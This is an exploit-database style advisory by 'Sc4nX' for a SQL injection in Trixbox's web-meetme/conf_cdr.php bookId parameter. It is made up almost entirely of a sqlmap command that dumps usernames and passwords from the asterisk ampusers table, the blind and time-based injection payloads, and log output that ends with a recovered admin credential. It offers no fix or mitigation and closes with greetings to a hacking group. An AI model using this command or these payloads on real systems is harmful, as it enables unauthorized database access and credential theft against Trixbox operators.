Trixbox All Versions - SQL Injection

# Exploit Title: SQL injection in Trixbox All Versions # Date: 13/03/2014 # Exploit Author: Sc4nX # Email : Sec744[at]yahoo.com - r1z[at]hackermail.com # Software Link: http://trixbox.org/downloads # Tested on: Linux / Win 7 Example : (Grab users / password hashes from ampusers)? root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10 [*] starting at 07:53:52 [07:53:52] [INFO] resuming back-end DBMS 'mysql' [07:53:52] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: bookId ? ? Type: boolean-based blind ? ? Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) ? ? Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK ? ? Type: AND/OR time-based blind ? ? Title: MySQL < 5.0.12 AND time-based blind (heavy query) ? ? Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM --- [07:53:52] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.8 web application technology: Apache 2.2.3, PHP 5.2.5 back-end DBMS: MySQL 5 [07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk' [07:53:52] [INFO] resumed: 2 [07:53:52] [INFO] retrieving the length of query output [07:53:52] [INFO] resumed: 8 [07:53:52] [INFO] resumed: username [07:53:52] [INFO] retrieving the length of query output [07:53:52] [INFO] resumed: 8 [07:53:52] [INFO] resumed: password [07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk' [07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk' [07:53:52] [INFO] resumed: 1 [07:53:52] [INFO] retrieving the length of query output [07:53:52] [INFO] resumed: 8 [07:53:52] [INFO] resumed: passw0rd [07:53:52] [INFO] retrieving the length of query output [07:53:52] [INFO] resumed: 5 [07:53:52] [INFO] resumed: admin [07:53:52] [INFO] analyzing table dump for possible password hashes Database: asterisk Table: ampusers [1 entry] +----------+----------+ | username | password | +----------+----------+ | admin ? ?| passw0rd | +----------+----------+ =================================================================================== GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com? The End :P